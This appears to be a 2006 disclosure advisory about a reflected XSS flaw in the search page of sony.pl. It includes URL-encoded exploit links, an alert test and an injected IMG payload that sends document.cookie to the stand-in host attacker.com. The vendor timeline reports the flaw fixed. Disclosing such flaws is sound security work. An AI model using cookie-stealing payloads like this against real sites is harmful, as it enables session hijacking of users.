kanedaaa... ... borys ... bohater ...
slackware - pakiety faqsecuritypublicartprocessinglinux mojetestslinkistatsstart
kaneda@bohater.net
+ Subject:
XSS bug for www.sony.pl

+ Version:
2006.10.29

+ Discovered by:
Kanedaaa: http://kaneda.bohater.net

+ www.sony.pl Description:
Official SONY site (Polish version)

+ Description:
XSS IN:
http://www.sony.pl/search/Search.action?site=odw_pl_PL&advanced=true&locale=&query=%22%3E%3CIMG+SRC%3Djavascript%3Alocation.href%3D%27http%3A%2F%2Fattacker.com%2Fxssscript.php%3Fcook%3D%27%2Bescape%28document.cookie%29%3E%3B%22%3E
http://www.sony.pl/search/Search.action?site=odw_pl_PL&advanced=true&locale=pl_PL&brand=all&query=%22%3E%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E

Posted data:
"><IMG SRC=javascript:location.href='http://attacker.com/xssscript.php?cook='+escape(document.cookie)>;">

Timeline:
2006.10.29 bug discovered
2006.11.09 bug sent via mail to http://sony.pl
2007.01.12 now its fixed

Original Advisory: http://kaneda.bohater.net/security/20061029-xss-sony.pl.php

Check my other bugs in security section: Security